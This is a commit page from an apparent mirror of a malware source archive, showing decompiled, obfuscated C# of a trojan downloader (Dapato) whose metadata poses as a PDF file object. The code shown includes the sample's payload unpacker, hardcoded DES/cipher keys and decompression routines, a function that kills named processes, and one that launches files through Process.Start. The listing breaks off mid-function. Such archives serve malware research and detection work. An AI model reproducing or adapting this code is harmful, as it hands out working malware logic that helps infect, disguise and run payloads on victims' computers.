daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/AssemblyInfo.cs
+18
View File
@@ -0,0 +1,18 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: PoweredBy("Powered by SmartAssembly 6.6.3.41")]
[assembly: AssemblyTitle("Objeto de arquivo PDF ©")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Arquivo PDF")]
[assembly: AssemblyCopyright("Copyright © 2012")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: Guid("68ef6356-44bd-4a76-9d0f-4e9a5e4d8d3d")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/SmartAssembly/Attributes/PoweredByAttribute.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/SmartAssembly/MemoryManagement/MemoryManager.cs
+58
View File
@@ -0,0 +1,58 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.MemoryManagement.MemoryManager
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SmartAssembly.MemoryManagement
{
public sealed class MemoryManager
{
internal static MemoryManager \u0001;
private long \u0001 = DateTime.Now.Ticks;
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u0001(
IntPtr process,
int minimumWorkingSetSize,
int maximumWorkingSetSize);
private void \u0001()
{
try
{
using (Process currentProcess = Process.GetCurrentProcess())
MemoryManager.\u0001(currentProcess.Handle, -1, -1);
}
catch
{
}
}
private void \u0001(object sender, EventArgs e)
{
try
{
long ticks = DateTime.Now.Ticks;
if (ticks - this.\u0001 <= 10000000L)
return;
this.\u0001 = ticks;
this.\u0001();
}
catch
{
}
}
internal MemoryManager()
{
Application.Idle += new EventHandler(this.\u0001);
this.\u0001();
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/Trojan-Downloader.Win32.Dapato.lnd.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CSPharm", "Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.csproj", "{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0001/_0001.cs
+26
View File
@@ -0,0 +1,26 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using System;
using System.Reflection;
namespace \u0001
{
internal sealed class \u0001 : IDisposable
{
internal readonly Type \u0001;
internal readonly object \u0002;
public \u0001()
{
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.DESCryptoServiceProvider");
this.\u0002 = Activator.CreateInstance(this.\u0001);
}
public void \u0001() => \u0001.\u0001(this);
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0002/_0001.cs
+14
View File
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
namespace \u0002
{
internal sealed class \u0001 : Attribute
{
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0002/_0002.cs
+92
View File
@@ -0,0 +1,92 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System.Runtime.InteropServices;
namespace \u0002
{
internal sealed class \u0002
{
internal static \u0002.\u0002.\u0001 \u0001;
internal static \u0002.\u0002.\u0002 \u0002;
internal static \u0002.\u0002.\u0003 \u0003;
internal static \u0002.\u0002.\u0004 \u0004;
internal static \u0002.\u0002.\u0005 \u0005;
internal static \u0002.\u0002.\u0006 \u0006;
internal static \u0002.\u0002.\u0007 \u0007;
internal static \u0002.\u0002.\u0008 \u0008;
internal static \u0002.\u0002.\u000E \u000E;
internal static \u0002.\u0002.\u000F \u000F;
internal static \u0002.\u0002.\u0010 \u0010;
internal static \u0002.\u0002.\u0011 \u0011;
internal static \u0002.\u0002.\u0012 \u0012;
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
internal struct \u0001
{
}
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
internal struct \u0002
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
internal struct \u0003
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
internal struct \u0004
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0005
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0006
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0007
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0008
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u000E
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u000F
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0010
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0011
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0012
{
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0003/_0001.cs
+869
View File
@@ -0,0 +1,869 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0004;
using SmartAssembly.MemoryManagement;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace \u0003
{
internal sealed class \u0001
{
static void \u0001([In] byte[] obj0, [In] \u0005.\u0003.\u0004 obj1)
{
int[] numArray1 = new int[16];
int[] numArray2 = new int[16];
if (true)
goto label_26;
label_4:
int index1;
for (; index1 < obj0.Length; ++index1)
{
int index2 = (int) obj0[index1];
if (index2 > 0)
++numArray1[index2];
}
int num1 = 0;
int length = 512;
for (int index3 = 1; index3 <= 15; ++index3)
{
numArray2[index3] = num1;
num1 += numArray1[index3] << 16 - index3;
if (index3 >= 10)
{
int num2 = numArray2[index3] & 130944;
int num3 = num1 & 130944;
length += num3 - num2 >> 16 - index3;
}
}
obj1.\u0001 = new short[length];
int num4 = 512;
for (int index4 = 15; index4 >= 10; --index4)
{
int num5 = num1 & 130944;
num1 -= numArray1[index4] << 16 - index4;
for (int index5 = num1 & 130944; index5 < num5; index5 += 128)
{
obj1.\u0001[(int) \u0003.\u0001.\u0001(index5)] = (short) (-num4 << 4 | index4);
num4 += 1 << index4 - 9;
}
}
for (int index6 = 0; index6 < obj0.Length; ++index6)
{
int index7 = (int) obj0[index6];
if (index7 != 0)
{
int num6 = numArray2[index7];
int index8 = (int) \u0003.\u0001.\u0001(num6);
if (index7 <= 9)
{
do
{
obj1.\u0001[index8] = (short) (index6 << 4 | index7);
index8 += 1 << index7;
}
while (index8 < 512);
}
else
{
int num7 = (int) obj1.\u0001[index8 & 511];
int num8 = 1 << (num7 & 15);
int num9 = -(num7 >> 4);
do
{
obj1.\u0001[num9 | index8 >> 9] = (short) (index6 << 4 | index7);
index8 += 1 << index7;
}
while (index8 < num8);
}
numArray2[index7] = num6 + (1 << 16 - index7);
}
}
return;
label_26:
index1 = 0;
goto label_4;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0005;
static bool \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0002 == obj0.\u0003;
static int \u0001([In] \u0005.\u0003.\u0002 obj0, [In] int obj1)
{
if (obj0.\u0005 < obj1)
goto label_4;
label_3:
return (int) ((long) obj0.\u0004 & (long) ((1 << obj1) - 1));
label_4:
if (obj0.\u0002 == obj0.\u0003)
return -1;
obj0.\u0004 |= (uint) (((int) obj0.\u0001[obj0.\u0002++] & (int) byte.MaxValue | ((int) obj0.\u0001[obj0.\u0002++] & (int) byte.MaxValue) << 8) << obj0.\u0005);
obj0.\u0005 += 16;
goto label_3;
}
static bool \u0001([In] Assembly obj0, [In] Assembly obj1)
{
byte[] publicKey1 = obj1.GetName().GetPublicKey();
byte[] publicKey2 = obj0.GetName().GetPublicKey();
if (publicKey2 == null != (publicKey1 == null))
return false;
if (publicKey2 != null)
{
for (int index = 0; index < publicKey2.Length; ++index)
{
if ((int) publicKey2[index] != (int) publicKey1[index])
return false;
}
}
return true;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0, [In] byte[] obj1, [In] int obj2, [In] int obj3)
{
int num1 = 0;
while (obj0.\u0005 > 0 && obj3 > 0)
{
obj1[obj2++] = (byte) obj0.\u0004;
obj0.\u0004 >>= 8;
obj0.\u0005 -= 8;
--obj3;
++num1;
}
if (obj3 == 0)
return num1;
int num2 = obj0.\u0003 - obj0.\u0002;
if (obj3 > num2)
obj3 = num2;
Array.Copy((Array) obj0.\u0001, obj0.\u0002, (Array) obj1, obj2, obj3);
obj0.\u0002 += obj3;
if ((obj0.\u0002 - obj0.\u0003 & 1) != 0)
{
obj0.\u0004 = (uint) obj0.\u0001[obj0.\u0002++] & (uint) byte.MaxValue;
obj0.\u0005 = 8;
}
return num1 + obj3;
}
static void \u0001([In] \u0002 obj0) => obj0.\u0001.GetMethod("Clear").Invoke(obj0.\u0002, new object[0]);
static void \u0001([In] \u0005.\u0003.\u0002 obj0)
{
obj0.\u0004 >>= obj0.\u0005 & 7;
obj0.\u0005 &= -8;
}
static int \u0001([In] int obj0) => \u0003.\u0001.\u0001(obj0) * 2;
static bool \u0001([In] \u0005.\u0003.\u0001 obj0)
{
int num1 = \u0003.\u0001.\u0001(obj0.\u0011);
if (true)
goto label_25;
label_23:
int num2;
while (num2 >= 258)
{
switch (obj0.\u0005)
{
case 7:
int num3;
while (((num3 = \u0003.\u0001.\u0001(obj0.\u0013, obj0.\u0010)) & -256) == 0)
{
\u0003.\u0001.\u0001(obj0.\u0011, num3);
if (--num2 < 258)
return true;
}
if (num3 < 257)
{
if (num3 < 0)
return false;
obj0.\u0014 = (\u0005.\u0003.\u0004) null;
obj0.\u0013 = (\u0005.\u0003.\u0004) null;
obj0.\u0005 = 2;
return true;
}
obj0.\u0007 = \u0005.\u0003.\u0001.\u0001[num3 - 257];
obj0.\u0006 = \u0005.\u0003.\u0001.\u0002[num3 - 257];
goto case 8;
case 8:
if (obj0.\u0006 > 0)
{
obj0.\u0005 = 8;
int num4 = \u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
if (num4 < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
obj0.\u0007 += num4;
}
obj0.\u0005 = 9;
goto case 9;
case 9:
int index = \u0003.\u0001.\u0001(obj0.\u0014, obj0.\u0010);
if (index < 0)
return false;
obj0.\u0008 = \u0005.\u0003.\u0001.\u0003[index];
obj0.\u0006 = \u0005.\u0003.\u0001.\u0004[index];
goto case 10;
case 10:
if (obj0.\u0006 > 0)
{
obj0.\u0005 = 10;
int num5 = \u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
if (num5 < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
obj0.\u0008 += num5;
}
\u0003.\u0001.\u0001(obj0.\u0011, obj0.\u0007, obj0.\u0008);
num2 -= obj0.\u0007;
obj0.\u0005 = 7;
continue;
default:
continue;
}
}
return true;
label_25:
num2 = num1;
goto label_23;
}
static void \u0001([In] string obj0)
{
foreach (Process process in Process.GetProcessesByName(obj0))
{
\u0003.\u0001.\u0001(\u0005.\u0001.\u0001(1314) + process.ProcessName + \u0005.\u0001.\u0001(1327));
process.Kill();
}
}
static bool \u0001([In] \u0005.\u0003.\u0005 obj0, [In] \u0005.\u0003.\u0002 obj1)
{
while (true)
{
switch (obj0.\u0006)
{
case 0:
obj0.\u0007 = \u0003.\u0001.\u0001(obj1, 5);
if (obj0.\u0007 >= 0)
{
obj0.\u0007 += 257;
\u0003.\u0001.\u0001(obj1, 5);
obj0.\u0006 = 1;
goto case 1;
}
else
goto label_2;
case 1:
obj0.\u0008 = \u0003.\u0001.\u0001(obj1, 5);
if (obj0.\u0008 >= 0)
{
++obj0.\u0008;
\u0003.\u0001.\u0001(obj1, 5);
obj0.\u000F = obj0.\u0007 + obj0.\u0008;
obj0.\u0004 = new byte[obj0.\u000F];
obj0.\u0006 = 2;
goto case 2;
}
else
goto label_5;
case 2:
obj0.\u000E = \u0003.\u0001.\u0001(obj1, 4);
if (obj0.\u000E >= 0)
{
obj0.\u000E += 4;
\u0003.\u0001.\u0001(obj1, 4);
obj0.\u0003 = new byte[19];
obj0.\u0012 = 0;
obj0.\u0006 = 3;
goto case 3;
}
else
goto label_8;
case 3:
for (; obj0.\u0012 < obj0.\u000E; ++obj0.\u0012)
{
int num = \u0003.\u0001.\u0001(obj1, 3);
if (num < 0)
return false;
\u0003.\u0001.\u0001(obj1, 3);
obj0.\u0003[\u0005.\u0003.\u0005.\u0013[obj0.\u0012]] = (byte) num;
}
obj0.\u0005 = new \u0005.\u0003.\u0004(obj0.\u0003);
obj0.\u0003 = (byte[]) null;
obj0.\u0012 = 0;
obj0.\u0006 = 4;
goto case 4;
case 4:
int num1;
while (((num1 = \u0003.\u0001.\u0001(obj0.\u0005, obj1)) & -16) == 0)
{
obj0.\u0004[obj0.\u0012++] = obj0.\u0011 = (byte) num1;
if (obj0.\u0012 == obj0.\u000F)
return true;
}
if (num1 >= 0)
{
if (num1 >= 17)
obj0.\u0011 = (byte) 0;
obj0.\u0010 = num1 - 16;
obj0.\u0006 = 5;
goto case 5;
}
else
goto label_19;
case 5:
int num2 = \u0005.\u0003.\u0005.\u0002[obj0.\u0010];
int num3 = \u0003.\u0001.\u0001(obj1, num2);
if (num3 >= 0)
{
\u0003.\u0001.\u0001(obj1, num2);
int num4 = num3 + \u0005.\u0003.\u0005.\u0001[obj0.\u0010];
while (num4-- > 0)
obj0.\u0004[obj0.\u0012++] = obj0.\u0011;
if (obj0.\u0012 != obj0.\u000F)
{
obj0.\u0006 = 4;
continue;
}
goto label_29;
}
else
goto label_24;
default:
continue;
}
}
label_2:
return false;
label_5:
return false;
label_8:
return false;
label_19:
return false;
label_24:
return false;
label_29:
return true;
}
static byte[] \u0001([In] byte[] obj0)
{
Assembly callingAssembly = Assembly.GetCallingAssembly();
Assembly executingAssembly = Assembly.GetExecutingAssembly();
if ((object) callingAssembly != (object) executingAssembly && !\u0003.\u0001.\u0001(callingAssembly, executingAssembly))
return (byte[]) null;
\u0005.\u0003.\u0007 obj1 = new \u0005.\u0003.\u0007(obj0);
byte[] numArray1 = new byte[0];
int num1 = \u0003.\u0001.\u0001(obj1);
if (num1 == 67324752)
{
short num2 = (short) \u0003.\u0001.\u0001(obj1);
int num3 = \u0003.\u0001.\u0001(obj1);
int num4 = \u0003.\u0001.\u0001(obj1);
if (num1 != 67324752 || num2 != (short) 20 || num3 != 0 || num4 != 8)
throw new FormatException("Wrong Header Signature");
\u0003.\u0001.\u0001(obj1);
\u0003.\u0001.\u0001(obj1);
\u0003.\u0001.\u0001(obj1);
int length = \u0003.\u0001.\u0001(obj1);
int count1 = \u0003.\u0001.\u0001(obj1);
int count2 = \u0003.\u0001.\u0001(obj1);
if (count1 > 0)
{
byte[] buffer = new byte[count1];
obj1.Read(buffer, 0, count1);
}
if (count2 > 0)
{
byte[] buffer = new byte[count2];
obj1.Read(buffer, 0, count2);
}
byte[] buffer1 = new byte[obj1.Length - obj1.Position];
obj1.Read(buffer1, 0, buffer1.Length);
\u0005.\u0003.\u0001 obj2 = new \u0005.\u0003.\u0001(buffer1);
numArray1 = new byte[length];
\u0003.\u0001.\u0001(numArray1, numArray1.Length, obj2, 0);
}
else
{
int num5 = num1 >> 24;
if (num1 - (num5 << 24) != 8223355)
throw new FormatException("Unknown Header");
if (num5 == 1)
{
int length1 = \u0003.\u0001.\u0001(obj1);
numArray1 = new byte[length1];
int num6;
for (int index = 0; index < length1; index += num6)
{
int length2 = \u0003.\u0001.\u0001(obj1);
num6 = \u0003.\u0001.\u0001(obj1);
byte[] buffer = new byte[length2];
obj1.Read(buffer, 0, buffer.Length);
\u0005.\u0003.\u0001 obj3 = new \u0005.\u0003.\u0001(buffer);
\u0003.\u0001.\u0001(numArray1, num6, obj3, index);
}
}
if (num5 == 2)
{
byte[] numArray2 = new byte[8]
{
(byte) 203,
(byte) 141,
(byte) 238,
(byte) 96,
(byte) 34,
(byte) 246,
(byte) 159,
(byte) 67
};
byte[] numArray3 = new byte[8]
{
(byte) 138,
(byte) 87,
(byte) 245,
(byte) 25,
(byte) 232,
(byte) 206,
(byte) 94,
(byte) 109
};
using (\u0001.\u0001 obj4 = new \u0001.\u0001())
{
using (ICryptoTransform cryptoTransform = \u0003.\u0001.\u0001(numArray3, obj4, numArray2, true))
numArray1 = \u0003.\u0001.\u0001(cryptoTransform.TransformFinalBlock(obj0, 4, obj0.Length - 4));
}
}
if (num5 == 3)
{
byte[] numArray4 = new byte[16]
{
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1
};
byte[] numArray5 = new byte[16]
{
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2
};
using (\u0002 obj5 = new \u0002())
{
using (ICryptoTransform cryptoTransform = \u0003.\u0001.\u0001(numArray4, obj5, true, numArray5))
numArray1 = \u0003.\u0001.\u0001(cryptoTransform.TransformFinalBlock(obj0, 4, obj0.Length - 4));
}
}
}
obj1.Close();
return numArray1;
}
static int \u0001([In] \u0005.\u0003.\u0004 obj0, [In] \u0005.\u0003.\u0002 obj1)
{
int index1;
if ((index1 = \u0003.\u0001.\u0001(obj1, 9)) < 0)
{
int num1 = obj1.\u0005;
int index2 = \u0003.\u0001.\u0001(obj1, num1);
int num2 = (int) obj0.\u0001[index2];
if (num2 < 0 || (num2 & 15) > num1)
return -1;
\u0003.\u0001.\u0001(obj1, num2 & 15);
return num2 >> 4;
}
\u0005.\u0003.\u0004 obj = obj0;
int num3;
if ((num3 = (int) obj.\u0001[index1]) >= 0)
{
\u0003.\u0001.\u0001(obj1, num3 & 15);
return num3 >> 4;
}
int num4 = -(num3 >> 4);
int num5 = num3 & 15;
int num6;
if ((num6 = \u0003.\u0001.\u0001(obj1, num5)) >= 0)
{
int num7 = (int) obj0.\u0001[num4 | num6 >> 9];
\u0003.\u0001.\u0001(obj1, num7 & 15);
return num7 >> 4;
}
int num8 = obj1.\u0005;
int num9 = \u0003.\u0001.\u0001(obj1, num8);
int num10 = (int) obj0.\u0001[num4 | num9 >> 9];
if ((num10 & 15) > num8)
return -1;
\u0003.\u0001.\u0001(obj1, num10 & 15);
return num10 >> 4;
}
static void \u0001([In] \u0005.\u0003.\u0003 obj0, [In] int obj1, [In] int obj2)
{
if ((obj0.\u0003 += obj1) > 32768)
throw new InvalidOperationException();
int sourceIndex = obj0.\u0002 - obj2 & (int) short.MaxValue;
int num = 32768 - obj1;
if (sourceIndex <= num && obj0.\u0002 < num)
{
if (obj1 <= obj2)
{
Array.Copy((Array) obj0.\u0001, sourceIndex, (Array) obj0.\u0001, obj0.\u0002, obj1);
obj0.\u0002 += obj1;
}
else
{
while (obj1-- > 0)
obj0.\u0001[obj0.\u0002++] = obj0.\u0001[sourceIndex++];
}
}
else
\u0003.\u0001.\u0001(obj0, sourceIndex, obj1, obj2);
}
static void \u0001([In] string obj0)
{
\u0003.\u0001.\u0001(\u0005.\u0001.\u0001(1332) + obj0 + \u0005.\u0001.\u0001(1327));
try
{
Process.Start(obj0);
}
catch (Exception ex1)
{
if (!(ex1.GetType().ToString() != \u0005.\u0001.\u0001(1353)))
return;
try
{
Process.Start(new ProcessStartInfo(\u0005.\u0001.\u0001(1402), obj0));
}
catch (Exception ex2)
{
}
}
}
static \u0005.\u0003.\u0004 \u0001([In] \u0005.\u0003.\u0005 obj0)
{
byte[] numArray = new byte[obj0.\u0008];
byte[] destinationArray;
if (true)
destinationArray = numArray;
Array.Copy((Array) obj0.\u0004, obj0.\u0007, (Array) destinationArray, 0, obj0.\u0008);
return new \u0005.\u0003.\u0004(destinationArray);
}
static int \u0001([In] int obj0)
{
int num = 1;
for (int index = 0; index < 10; ++index)
num += obj0;
return num;
}
static ICryptoTransform \u0001(
[In] byte[] obj0,
[In] \u0001.\u0001 obj1,
[In] byte[] obj2,
[In] bool obj3)
{
obj1.\u0001.GetProperty("Key").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj2
});
obj1.\u0001.GetProperty("IV").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj0
});
return (ICryptoTransform) obj1.\u0001.GetMethod(obj3 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(obj1.\u0002, new object[0]);
}
static void \u0001([In] string obj0)
{
if (!\u0004.\u0001.\u0004)
return;
StreamWriter streamWriter = File.Exists(\u0005.\u0001.\u0001(1419)) ? File.AppendText(\u0005.\u0001.\u0001(1419)) : new StreamWriter(\u0005.\u0001.\u0001(1419));
streamWriter.WriteLine((object) DateTime.Now);
streamWriter.WriteLine(obj0);
streamWriter.WriteLine();
streamWriter.Close();
}
static int \u0001([In] int obj0, [In] int obj1, [In] byte[] obj2, [In] \u0005.\u0003.\u0003 obj3)
{
int num1 = obj3.\u0002;
if (obj0 > obj3.\u0003)
obj0 = obj3.\u0003;
else
num1 = obj3.\u0002 - obj3.\u0003 + obj0 & (int) short.MaxValue;
int num2 = obj0;
int length = obj0 - num1;
if (length > 0)
{
Array.Copy((Array) obj3.\u0001, 32768 - length, (Array) obj2, obj1, length);
obj1 += length;
obj0 = num1;
}
Array.Copy((Array) obj3.\u0001, num1 - obj0, (Array) obj2, obj1, obj0);
obj3.\u0003 -= num2;
if (obj3.\u0003 < 0)
throw new InvalidOperationException();
return num2;
}
static short \u0001([In] int obj0) => (short) ((int) \u0005.\u0003.\u0006.\u0002[obj0 & 15] << 12 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 4 & 15] << 8 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 8 & 15] << 4 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 12]);
static int \u0001([In] \u0005.\u0003.\u0003 obj0) => obj0.\u0003;
static ICryptoTransform \u0001(
[In] byte[] obj0,
[In] \u0002 obj1,
[In] bool obj2,
[In] byte[] obj3)
{
obj1.\u0001.GetProperty("Key").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj0
});
obj1.\u0001.GetProperty("IV").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj3
});
return (ICryptoTransform) obj1.\u0001.GetMethod(obj2 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(obj1.\u0002, new object[0]);
}
static void \u0001([In] \u0001.\u0001 obj0) => obj0.\u0001.GetMethod("Clear").Invoke(obj0.\u0002, new object[0]);
static void \u0001([In] \u0005.\u0003.\u0003 obj0, [In] int obj1)
{
\u0005.\u0003.\u0003 obj = obj0;
int num1;
int num2 = num1 = obj.\u0003;
obj.\u0003 = num1 + 1;
if (num2 == 32768)
throw new InvalidOperationException();
obj0.\u0001[obj0.\u0002++] = (byte) obj1;
obj0.\u0002 &= (int) short.MaxValue;
}
static void \u0001([In] \u0005.\u0003.\u0002 obj0, [In] int obj1)
{
obj0.\u0004 >>= obj1;
obj0.\u0005 -= obj1;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0003 - obj0.\u0002 + (obj0.\u0005 >> 3);
static \u0005.\u0003.\u0004 \u0001([In] \u0005.\u0003.\u0005 obj0)
{
byte[] destinationArray = new byte[obj0.\u0007];
Array.Copy((Array) obj0.\u0004, 0, (Array) destinationArray, 0, obj0.\u0007);
return new \u0005.\u0003.\u0004(destinationArray);
}
static void \u0001([In] int obj0, [In] int obj1, [In] byte[] obj2, [In] \u0005.\u0003.\u0002 obj3)
{
if (obj3.\u0002 < obj3.\u0003)
throw new InvalidOperationException();
int num = obj1 + obj0;
if (0 > obj1 || obj1 > num || num > obj2.Length)
throw new ArgumentOutOfRangeException();
if ((obj0 & 1) != 0)
{
obj3.\u0004 |= (uint) (((int) obj2[obj1++] & (int) byte.MaxValue) << obj3.\u0005);
obj3.\u0005 += 8;
}
obj3.\u0001 = obj2;
obj3.\u0002 = obj1;
obj3.\u0003 = num;
}
static int \u0001([In] byte[] obj0, [In] int obj1, [In] \u0005.\u0003.\u0001 obj2, [In] int obj3)
{
int num1 = 0;
do
{
if (obj2.\u0005 != 11)
goto label_5;
label_2:
continue;
label_5:
int num2 = \u0003.\u0001.\u0001(obj1, obj3, obj0, obj2.\u0011);
obj3 += num2;
num1 += num2;
obj1 -= num2;
if (obj1 != 0)
goto label_2;
else
goto label_1;
}
